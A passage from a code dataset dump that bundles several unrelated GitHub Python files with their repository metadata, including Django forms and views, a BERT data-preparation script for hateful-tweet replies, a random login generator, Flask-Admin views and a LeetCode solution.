'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidencePersonRelation\n fields = ('evidence', 'person', 'page_number', 'description')\n\n\nclass InstitutionInstallationRelationForm(ModelForm):\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = InstitutionInstallationRelation\n fields = ('institution', 'installation', 'type_of_involvement')\n\n\nclass EvidenceInstallationRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidenceInstallationRelation\n fields = ('evidence', 'installation', 'page_number', 'description')\n\n\nclass EvidenceInstitutionRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidenceInstitutionRelation\n fields = ('evidence', 'institution', 'page_number', 'description')\n\n\nclass InstallationInstallationRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = InstallationInstallationRelation\n fields = ('primary', 'secondary', 'description')\n\n\nclass InstitutionInstitutionRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = InstitutionInstitutionRelation\n fields = ('primary', 'secondary', 'description')\n\n\nclass PersonPersonRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = PersonPersonRelation\n fields = ('primary', 'secondary', 'description')\n\n\n# Formsets\npersoncity_formset = inlineformset_factory(\n Person, CityPersonRelation, form=CityPersonRelationForm, extra=1)\n\npersonneighbourhood_formset = inlineformset_factory(\n Person, NeighbourhoodPersonRelation, form=NeighbourhoodPersonRelationForm, extra=1)\n\npersoninstitution_formset = inlineformset_factory(\n Person, PersonInstitutionRelation, form=PersonInstitutionRelationForm, extra=1)\ninstitutionperson_formset = inlineformset_factory(\n Institution, PersonInstitutionRelation, form=PersonInstitutionRelationForm, extra=1)\n\npersoninstallation_formset = inlineformset_factory(\n Person, PersonInstallationRelation, form=PersonInstallationRelationForm, extra=1)\ninstallationperson_formset = inlineformset_factory(\n Installation, PersonInstallationRelation, form=PersonInstallationRelationForm, extra=1)\n\npersonevidence_formset = inlineformset_factory(\n Person, EvidencePersonRelation, form=EvidencePersonRelationForm, extra=1)\nevidenceperson_formset = inlineformset_factory(\n Evidence, EvidencePersonRelation, form=EvidencePersonRelationForm, extra=1)\n\ninstallationinstitution_formset = inlineformset_factory(\n Installation, InstitutionInstallationRelation, form=InstitutionInstallationRelationForm, extra=1)\ninstitutioninstallation_formset = inlineformset_factory(\n Institution, InstitutionInstallationRelation, form=InstitutionInstallationRelationForm, extra=1)\n\ninstallationevidence_formset = inlineformset_factory(\n Installation, EvidenceInstallationRelation, form=EvidenceInstallationRelationForm, extra=1)\nevidenceinstallation_formset = inlineformset_factory(\n Evidence, EvidenceInstallationRelation, form=EvidenceInstallationRelationForm, extra=1)\n\ninstitutionevidence_formset = inlineformset_factory(\n Institution, EvidenceInstitutionRelation, form=EvidenceInstitutionRelationForm, extra=1)\nevidenceinstitution_formset = inlineformset_factory(\n Evidence, EvidenceInstitutionRelation, form=EvidenceInstitutionRelationForm, extra=1)\n\ninstallationinstallation_formset = inlineformset_factory(\n Installation, InstallationInstallationRelation, fk_name='primary', fields='__all__', extra=1,\n form=InstallationInstallationRelationForm)\n\ninstitutioninstitution_formset = inlineformset_factory(\n Institution, InstitutionInstitutionRelation, fk_name='primary', fields='__all__', extra=1,\n form=InstitutionInstitutionRelationForm)\n\npersonperson_formset = inlineformset_factory(\n Person, PersonPersonRelation, fk_name='primary', fields='__all__', extra=1, form=PersonPersonRelationForm)\n\ndattr = {'attrs': {'style': 'width:100%'}}\ndnumber = {'widget': forms.NumberInput(attrs={'style': 'width:100%', 'rows': 3}), 'required': False}\ndchar_required = {'widget': forms.TextInput(**dattr), 'required': True}\n\n\nclass StyleForm(ModelForm):\n name = forms.CharField(**dchar_required)\n stroke_opacity = forms.FloatField(**dnumber)\n stroke_weight = forms.IntegerField(**dnumber)\n fill_opacity = forms.FloatField(**dnumber)\n z_index = forms.FloatField(**dnumber)\n\n class Meta:\n model = Style\n f = 'stroke_weight,stroke_opacity,color,fill_opacity'\n f += ',dashed,name,z_index'\n fields = f.split(',')\n","repo_name":"Kandroodi/WaterSystem","sub_path":"installations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":33888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"2071922165","text":"import argparse\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom transformers import AutoTokenizer \nimport torch\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nimport os\n\n# Constant seed for reproducibility.\nSEED = 42\nBATCH_SIZE = 16\n\ndef preprocess_dataframe_tweets(df,col='tweet'):\n #remove URL\n df[col + '_proc'] = df[col].str.replace(r'http(\\S)+', r'')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'http ...', r'')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'http', r'')\n # remove RT, @\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'(RT|rt)[ ]*@[ ]*[\\S]+',r'')\n df[df[col + '_proc'].str.contains(r'RT[ ]?@')]\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'@[\\S]+',r'')\n #remove non-ascii words and characters\n df[col + '_proc'] = [''.join([i if ord(i) < 128 else '' for i in text]) for text in df[col + '_proc']]\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'_[\\S]?',r'')\n #remove &, < and >\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'&?',r'and')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'<',r'<')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'>',r'>')\n # remove extra space\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'[ ]{2, }',r' ')\n # insert space between punctuation marks\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'([\\w\\d]+)([^\\w\\d ]+)', r'\\1 \\2')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'([^\\w\\d ]+)([\\w\\d]+)', r'\\1 \\2')\n # lower case and strip white spaces at both ends\n df[col + '_proc'] = df[col + '_proc'].str.lower()\n df[col + '_proc'] = df[col + '_proc'].str.strip()\n\ndef encode_sentence(s, tokenizer):\n return tokenizer.encode_plus(\n\t\ts, # Sentence to encode.\n\t\tadd_special_tokens = True, # Add '[CLS]' and '[SEP]'\n\t\tmax_length = 128, # Pad & truncate all sentences.\n\t\tpad_to_max_length = True,\n\t\treturn_attention_mask = True, # Construct attn. masks.\n\t\treturn_tensors = 'pt', # Return pytorch tensors.\n\t)\n\ndef bert_encode(df, tokenizer, max_seq_length=512):\n input_ids = []\n attention_masks = []\n for sent in df[['Hateful Tweet', 'Reply Tweet']].values:\n sent = sent[0] + ' [SEP] ' + sent[1]\n encoded_dict = tokenizer.encode_plus(\n\t\t\tsent, # Sentence to encode.\n\t\t\tadd_special_tokens = True, # Add '[CLS]' and '[SEP]'\n\t\t\tmax_length = 128, # Pad & truncate all sentences.\n\t\t\tpad_to_max_length = True,\n\t\t\treturn_attention_mask = True, # Construct attn. masks.\n\t\t\treturn_tensors = 'pt', # Return pytorch tensors.\n\t\t)\n \n # Add the encoded sentence to the list. \n input_ids.append(encoded_dict['input_ids'])\n \n # And its attention mask (simply differentiates padding from non-padding).\n attention_masks.append(encoded_dict['attention_mask'])\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n\n inputs = {\n 'input_word_ids': input_ids,\n 'input_mask': attention_masks}\n\n return inputs\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description=__doc__)\n\tparser.add_argument(\"--csv-file\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp=\"Location of the data file in a .csv format.\")\n\tparser.add_argument(\"--question\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp=\"A number from 1 to 4 indicating the question number.\")\n\tparser.add_argument(\"--model-name\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp='Which model to use, either bert or bertweet.')\n\tparser.add_argument(\"--output-dir\", required=False, default=\"./Dataloaders\",\n\t\t\t\t\t\t\t\t\t\t\thelp=\"A directory to save the output files in.\")\n\targs = parser.parse_args()\n\tcsv_file = args.csv_file\n\n\tif int(args.question) not in [1, 2, 3, 4]:\n\t\traise Exception(\"Question number must be in [1, 2, 3, 4].\")\n\telse:\n\t\tQ = \"Q\" + args.question\n\n\tif os.path.isfile(csv_file) :\n\t\tdf = pd.read_csv(csv_file)\n\t\tdataset = df[~df[Q].isnull()]\n\telse:\n\t\traise Exception(f'CSV file \"{csv_file}\" not found.')\n\t\t\n\tif args.model_name.lower() not in [\"bert\", \"bertweet\"]:\n\t\traise Exception(f\"Model name must be either bert or bertweet.\")\n\telse:\n\t\tmodel_name = args.model_name.lower()\n\t\n\toutput_dir = args.output_dir\n\tif not os.path.isdir(output_dir):\n\t\tos.mkdir(output_dir)\n\n\tX_train, X_test, y_train, y_test = train_test_split(\n\t\tdataset[['Hateful Tweet', 'Reply Tweet']], \n\t\tdataset[Q],\n\t\ttest_size=0.2, \n\t\tstratify=dataset[Q],\n\t\trandom_state=SEED\n\t)\n\tX_train, X_val, y_train, y_val = train_test_split(\n\t\tX_train, \n\t\ty_train,\n\t\ttest_size=0.1, \n\t\tstratify=y_train,\n\t\trandom_state=SEED\n\t)\n\n\tdf_train = X_train.join(y_train)\n\tdf_val = X_val.join(y_val)\n\tdf_test = X_test.join(y_test)\n\n\tpreprocess_dataframe_tweets(df_train,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_train,col='Reply Tweet')\n\n\tpreprocess_dataframe_tweets(df_val,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_val,col='Reply Tweet')\n\n\tpreprocess_dataframe_tweets(df_test,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_test,col='Reply Tweet')\n\tif model_name == \"bert\":\n\t\ttokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\",use_fast=True, normalization=True)\n\telse:\n\t\ttokenizer = AutoTokenizer.from_pretrained(\"vinai/bertweet-base\",use_fast=True, normalization=True)\n\n\ttweet_train = bert_encode(df_train, tokenizer)\n\ttweet_train_labels = df_train[Q].astype(int)\n\ttweet_valid = bert_encode(df_val, tokenizer)\n\ttweet_valid_labels = df_val[Q].astype(int)\n\ttweet_test = bert_encode(df_test, tokenizer)\n\ttweet_test_labels = df_test[Q].astype(int)\n\n\tinput_ids, attention_masks = tweet_train.values()\n\tlabels = tweet_train_labels\n\n\t# Combine the training inputs into a TensorDataset.\n\tinput_ids, attention_masks = tweet_train.values()\n\tlabels = torch.tensor(tweet_train_labels.values,dtype=torch.long)\n\ttrain_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\t# Create a 90-10 train-validation split.\n\tinput_ids, attention_masks = tweet_valid.values()\n\tlabels = torch.tensor(tweet_valid_labels.values,dtype=torch.long)\n\tval_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\n\t# Create a 90-10 train-validation split.\n\tinput_ids, attention_masks = tweet_test.values()\n\tlabels = torch.tensor(tweet_test_labels.values,dtype=torch.long)\n\ttest_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\t# The DataLoader needs to know our batch size for training, so we specify it \n\t# here. For fine-tuning BERT on a specific task, the authors recommend a batch size of 16 or 32.\n\n\t# Create the DataLoaders for our training and validation sets.\n\t# We'll take training samples in random order. \n\ttrain_dataloader = DataLoader(\n\t\t\t\ttrain_dataset, # The training samples.\n\t\t\t\tsampler = RandomSampler(train_dataset), # Select batches randomly\n\t\t\t\tbatch_size = BATCH_SIZE # Trains with this batch size.\n\t\t\t)\n\n\t# For validation the order doesn't matter, so we'll just read them sequentially.\n\tvalidation_dataloader = DataLoader(\n\t\t\t\tval_dataset, # The validation samples.\n\t\t\t\tsampler = SequentialSampler(val_dataset), # Pull out batches sequentially.\n\t\t\t\tbatch_size = BATCH_SIZE # Evaluate with this batch size.\n\t\t\t)\n\n\t# For testing the order doesn't matter, so we'll just read them sequentially.\n\ttesting_dataloader = DataLoader(\n\t\t\t\ttest_dataset, # The validation samples.\n\t\t\t\tsampler = SequentialSampler(test_dataset), # Pull out batches sequentially.\n\t\t\t\tbatch_size = BATCH_SIZE # Evaluate with this batch size.\n\t\t\t)\n\n\ttorch.save(train_dataloader, os.path.join(output_dir, 'train.pth'))\n\ttorch.save(validation_dataloader, os.path.join(output_dir, 'valid.pth'))\n\ttorch.save(testing_dataloader, os.path.join(output_dir, 'test.pth'))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"albanyan/hateful-tweets-replies","sub_path":"Code/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"14863603667","text":"import random\nimport string\n\n\ndef log_gen():\n lst_1 = [\"Ae\", \"Di\", \"Mo\", \"Fam\", \"Ri\", \"Tr\", \"Sa\"]\n lst_2 = [\"dar\", \"kil\", \"glar\", \"dom\", \"tlar\", \"pyt\", \"ben\", \"sed\", \"grim\"]\n rand_number = random.randint(0, 1)\n if rand_number == 1:\n random_log = f\"{random.choice(lst_1)}{random.choice(lst_2)}{random.randint(1, 100)}\"\n return random_log\n else:\n random_log = f\"{random.choice(lst_1)}{random.choice(lst_2)}\"\n return random_log\n\n\ndef pass_gen():\n result = \"\"\n choices = string.ascii_letters + string.digits + \"!@#$%^&*\"\n for i in range(8):\n result += random.choice(choices)\n return result\n\n\ndef mails_gen(login):\n lst_mails = [\"gmail.com\", \"mail.ru\", \"uk.net\"]\n result_mail = f\"{login}@{random.choice(lst_mails)}\"\n return result_mail\n\n","repo_name":"lipatoS/my_1st_django","sub_path":"app/currency/login_gen.py","file_name":"login_gen.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30869542141","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport xlsxwriter\n\n\n# Create an new Excel file and add a worksheet.\nworkbook = xlsxwriter.Workbook('demo1.xlsx')\nworksheet = workbook.add_worksheet()\n\n# Widen the first column to make the text clearer.\n# 设定第一列(A)宽度为20像素\nworksheet.set_column('A:A', 20)\n\n# Add a bold format to use to highlight cells.\n#bold = workbook.add_format({'bold': True})\n# 设置为粗体\nbold = workbook.add_format()\nbold.set_bold()\n\n# Write some simple text.\n# A1单元格写入 hello\nworksheet.write('A1', 'Hello')\n\n# Text with formatting.\n# A2 单元格写入粗体\nworksheet.write('A2', 'World', bold)\n\n# 写入中文\nworksheet.write('B2', u'中文测试', bold)\n\n# Write some numbers, with row/column notation.\n# 用行列表示法写入32和35.5\n# 行列表示法的单元格下标以0作为起始值,'3,0'等价于'A5'\nworksheet.write(2, 0, 32)\nworksheet.write(3, 0, 35.5)\n\n# 求A3,A4的和,并结果写入A4\nworksheet.write(4, 0, '=SUM(A3:A4)')\n\n# Insert an image.\n# 插入图片\nworksheet.insert_image('B5', 'img/python-logo.png')\n\nworkbook.close()\n","repo_name":"cyril7/mygit","sub_path":"python/sysadmin/XlsxWriter/xls-manipulate.py","file_name":"xls-manipulate.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18224400989","text":"from django.shortcuts import render, redirect\nfrom .models import Publicacion, Persona , Comment\n#from django.views import generic\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\n#nuevo\nfrom django.contrib.auth import logout as do_logout\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth import login as do_login\n# add to the top\nfrom mylife.forms import ContactForm, CommentForm\n\nfrom mylife.forms import ComentarioForm\nfrom django.forms import ModelForm\nfrom django.template import RequestContext\n\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\n\n#def index(request):\n #latest_question_list = Publicacion.objects.all()\n #context = {'latest_question_list': latest_question_list}\n #return render(request, 'mylife/index.html', context)\n\n#class IndexView(generic.ListView):\n #template_name = 'mylife/index.html'\n #context_object_name = 'latest_question_list'\n\ndef index(request):\n posts = Publicacion.objects.filter(fecha_publicacion__lte=timezone.now()).order_by('fecha_publicacion')\n if request.user.is_authenticated:\n return render(request, 'mylife/index.html', {'posts': posts} )\n return redirect(\"/login\")\n \n\n\n \ndef post_detail(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n return render(request, 'mylife/post_detail.html', {'post': post})\n\n\n#def image(request):\n#post = Publicacion.objects.all()\n #for mycar in post:\n #MyCar = mycar.mi_foto.url\n #variables = RequestContext(request,{'post':MyCar })\n # return render_to_response('index.html',variables)\n\n\n #def get_queryset(request ):\n #\"\"\"Return the last five published questions.\"\"\"\n # return Publicacion.objects.order_by()\n \n\n#class DetailView(generic.DetailView):\n # model = Publicacion\n #template_name = 'mylife/detalle.html'\n\ndef welcome(request):\n if request.user.is_authenticated: # si estamos identificados devolvemos la portada\n return render(request, \"mylife/index.html\")\n return redirect(\"/login\") # si no redireccionamos al login\n\n\ndef register(request):\n form = UserCreationForm()# Creamos el formulario de autenticación vacío\n form.fields['username'].help_text = None\n form.fields['password1'].help_text = None\n form.fields['password2'].help_text = None\n \n if request.method == \"POST\":\n form = UserCreationForm(data=request.POST)# Añadimos los datos recibidos al formulario\n if form.is_valid(): # Si el formulario es válido...\n user = form.save() # Creamos la nueva cuenta de usuario\n if user is not None: # Si el usuario se crea correctamente\n do_login(request, user) # Hacemos el login manualmente\n return redirect('/')# Y le redireccionamos a la portada\n return render(request, \"mylife/register.html\", {'form': form}) # Si llegamos al final renderizamos el formulario\n\n\ndef login(request):\n form = AuthenticationForm() # creamos el formulario de autentificacion\n if request.method == \"POST\":\n form = AuthenticationForm(data=request.POST)# AÑADIMOS los datos recibidos al form\n if form.is_valid(): # si el form es valido\n username = form.cleaned_data['username'] # recuperamos la credenciales validas\n password = form.cleaned_data['password'] # recuperamos la credenciales validas\n user = authenticate(username=username,password=password) #verificamos las credenciales del user\n if user is not None: # si existe un user con ese nombre y password\n do_login(request, user) # hacemos el login manualmente\n return redirect('/')\n\n return render(request, 'mylife/login.html', {'form':form}) # si llegamos al final renderizamos el formulario\n\n\ndef logout(request):\n do_logout(request) #finalizamos la secion\n return redirect('/') #redireccionamos ala portada\n\n\ndef quienessomos(request):\n return render(request, 'mylife/quienessomos.html')\n\n\n\ndef contacto(request):\n form_class = ContactForm\n return render(request, 'mylife/contacto.html', {'form': form_class,})\n\n\n\n\n#formulario = form.save(commit=False)\n\n\n\n\ndef post_new(request):\n if request.method == \"POST\":\n form = ComentarioForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = ComentarioForm()\n return render(request, 'mylife/post_detail.html', {'form': form})\n\n\n\n\ndef post_edit(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n if request.method == \"POST\":\n form = ComentarioForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = ComentarioForm(instance=post)\n return render(request, 'mylife/post_edit.html', {'form': form})\n\n\n\n\ndef add_comment_to_post(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = CommentForm()\n return render(request, 'mylife/add_comment_to_post.html', {'form': form} )\n\n\n@login_required\ndef comment_approve(request, pk):\n comment = get_object_or_404(Comment, pk=pk)\n comment.approve()\n return redirect('post_detail', pk=comment.post.pk)\n\n@login_required\ndef comment_remove(request, pk):\n comment = get_object_or_404(Comment, pk=pk)\n comment.delete()\n return redirect('post_detail', pk=comment.post.pk)\n\n\n\n\n\n","repo_name":"mylife-rosario/mylife","sub_path":"sitiomylife/mylife/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33360998795","text":"from api.mysql.controllers.controller import EmployeeAPI, EarlyClockIn\nfrom api.utils.admin_helpers import validate_email\n\nfrom flask_admin import Admin, AdminIndexView, BaseView, expose\nfrom flask import redirect, url_for, request\n# from flask_security import current_user\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_login import current_user\n\n\nfrom flask_security.forms import LoginForm as OriginalLoginForm\nfrom wtforms import validators\n\n\n\n\nclass MyAdminIndexView(AdminIndexView):\n def is_accessible(self):\n return current_user.is_authenticated and current_user.has_role('admin')\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n # def is_accessible(self):\n # return current_user.is_authenticated and current_user.has_role('admin')\n #\n # def inaccessible_callback(self, name, **kwargs):\n # return redirect(url_for('security.login', next=request.url))\n# views_bp = Blueprint('views', __name__)\n# You can customize this class as you like\nclass EmployeeModelView(ModelView):\n def is_accessible(self):\n return current_user.is_authenticated and current_user.has_role('admin')\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n # def is_accessible(self):\n # return current_user.is_authenticated and current_user.has_role('admin')\n # def inaccessible_callback(self, name, **kwargs):\n # return redirect(url_for('security.login', next=request.url))\n column_labels = {\n 'name' : '姓名',\n 'email' : '电子邮件',\n 'position' : '职称',\n 'employee_number' : '员工号码',\n 'create_at' : '到职日',\n 'phone_number' :'电话号码',\n 'gender' :'性别',\n 'department' :'部门',\n 'birth_date':'出生年月日',\n 'address' : '住址',\n 'salary' : '薪资',\n 'nationality' : '国籍'\n }\n form_excluded_columns = ['create_at']\n # 显示在列表视图中的字段\n column_list = ('employee_number','name', 'email','phone_number','gender','birth_date', 'position','department','address','nationality','create_at')\n column_editable_list = ('name', 'email', 'position')\n # 可以搜索的字段\n column_searchable_list = ('employee_number','name', 'email')\n\n # 可以过滤的字段\n column_filters = ('position',)\n form_args = {\n 'email': {\n 'validators': [validate_email],\n }\n }\n form_choices = {\n 'gender': [\n ('male', '男'),\n ('female', '女')\n ],\n 'department': [\n ('HR', '人力资源'),\n ('Engineering', '工程'),\n ('Marketing', '市场营销'),\n # 更多部门\n ],\n 'nationality': [\n ('US', '美国'),\n ('UK', '英国'),\n ('CN', '中国'),\n ('TW', '台湾'),\n ('other', '其他'),\n # ... 其他国籍\n ]\n }\n column_descriptions = {\n 'email': '用于登录和接收通知的电子邮件地址。',\n 'salary': '月薪。'\n }\n column_sortable_list = ('employee_number', 'name', 'email', 'create_at')\n\n column_formatters = {\n 'birth_date': lambda v, c, m, p: m.birth_date.strftime('%Y-%m-%d') if m.birth_date else '',\n }\n\n\n\n\nclass EmployeeRecordView(BaseView):\n @expose('/')\n def index(self):\n api = EmployeeAPI()\n employee_data = api.get()\n return self.render('admin/employee_record.html', employee_data=employee_data)\n\nclass EarlyClockView(BaseView):\n @expose('/')\n def index(self):\n api = EarlyClockIn()\n clock_data = api.get()\n return self.render('admin/early_clock.html', clock_data=clock_data)\n\n# column_labels:用于自订字段标签的显示。您可以使用这个属性来替换字段名称为更加易读的标签。\n#\n# column_editable_list:用于指定哪些字段可以在列表页面中直接编辑。将字段名称添加到这个列表中,将使它们在列表页面中变成可编辑的字段。\n#\n# column_searchable_list:用于指定可以进行搜寻的字段。将字段名称添加到这个列表中,将允许您在列表页面上使用搜索框来搜寻这些字段的内容。\n#\n# column_sortable_list:用于指定可以进行排序的字段。将字段名称添加到这个列表中,将允许您在列表页面上按这些字段进行排序。\n#\n# column_default_sort:用于设定预设的排序方式。可以设定为元组,包含要排序的字段名称和排序顺序('asc' 或 'desc')。\n#\n# column_formatters:用于自订字段在列表页面中的显示格式。可以使用这个属性来对特定字段的值进行格式化处理。\n#\n# column_descriptions:用于提供字段的描述信息,将显示为字段标签的 tooltip。\n#\n# form_columns:用于指定在新增和编辑页面中显示的字段。默认情况下,所有字段都会显示,但您可以使用这个属性仅显示特定的字段。\n#\n# column_choices:用于定义字段的选项列表,使它们在列表页面中以人类可读的值显示。\n# @views_bp.route('/')\n# def index():\n# return render_template('indexbak.html')\n","repo_name":"RuiZheYang1991/Clock-In-System","sub_path":"app/api/admin/admin_view.py","file_name":"admin_view.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8802240214","text":"import collections\n\n\ndef numSmallerByFrequency(queries, words):\n def funcF(string):\n tmp = collections.Counter(string)\n first = sorted(list(tmp.keys()))\n\n return tmp[first[0]]\n\n q = [funcF(x) for x in queries]\n w = [funcF(w) for w in words]\n ret = []\n for query in q:\n cnt = 0\n for word in w:\n if query < word:\n cnt += 1\n ret.append(cnt)\n return ret\n\n\n\nif __name__ == \"__main__\":\n queries =[\"bba\",\"abaaaaaa\",\"aaaaaa\",\"bbabbabaab\",\"aba\",\"aa\",\"baab\",\"bbbbbb\",\"aab\",\"bbabbaabb\"]\n words = [\"aaabbb\",\"aab\",\"babbab\",\"babbbb\",\"b\",\"bbbbbbbbab\",\"a\",\"bbbbbbbbbb\",\"baaabbaab\",\"aa\"]\n print(numSmallerByFrequency(queries, words))\n","repo_name":"RioAraki/leetcode2020","sub_path":"leetcode_python/1170_CompareStringsbyFrequencyoftheSmallestCharacter.py","file_name":"1170_CompareStringsbyFrequencyoftheSmallestCharacter.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43235474829","text":"import json\nimport click\n\nfrom os.path import join, isdir\nfrom os import makedirs\n\nfrom experiment.train_test import train_test\nfrom utilities.repro import set_seed\n\n\n@click.command()\n@click.argument('settings_fpath', type=click.Path(exists=True))\n@click.argument('seed', type=int)\ndef run(settings_fpath, seed):\n with open(settings_fpath) as j_file:\n settings = json.load(j_file)\n\n set_seed(seed)\n output_dir = join(settings['output_dir'])\n if not isdir(output_dir):\n makedirs(output_dir)\n\n train_test(settings['data_dir'],\n output_dir,\n settings['trans_parameters'],\n settings['train_parameters'],\n settings['device'],\n seed=seed)\n\n\nif __name__ == 